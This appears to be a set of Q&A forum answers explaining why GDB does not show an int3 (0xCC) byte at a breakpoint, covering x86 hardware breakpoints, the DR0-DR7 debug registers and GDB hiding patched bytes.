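The only difference is at main+8, where the first byte of the movq instruction (0x48) has been replaced by the int3 opcode 0xcc.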
If your hardware supports it, GDB may be using Hardware Breakpoints, which do not patch the code.
While I have not confirmed this via any official docs, this page indicates that
By default, gdb attempts to use hardware-assisted break-points.
Since you indicate expecting 0xCC bytes, I'm assuming you're running on x86 hardware, as the int3 opcode is 0xCC. x86 processors have a set of debug registers DR0-DR3, where you can program the address of data to cause a breakpoint exception. DR7 is a bitfield which controls the behavior of the breakpoints, and DR6 indicates the status.
The debug registers can only be read/written from Ring 0 (kernel mode). That means that the kernel manages these registers for you (via the ptrace API, I believe.)
However, for the sake of anti-debugging, all hope is not lost! On Windows, the GetThreadContext API allows you to get (a copy) of the CONTEXT for a (stopped) thread. This structure includes the contents of the DRx registers. This question is about how to implement the same on Linux.
This may also be a white lie that GDB is telling you... there may be a breakpoint there in RAM but GDB has noted what was there beforehand (so it can restore it later) and is showing you that, instead of the true contents of RAM.
Of course, it could also be using Hardware Breakpoints, which is a facility available on some processors. Setting h/w breakpoints is done by telling the processor the address it should watch out for (and trigger a breakpoint interrupt if it gets hit by the program counter while executing code).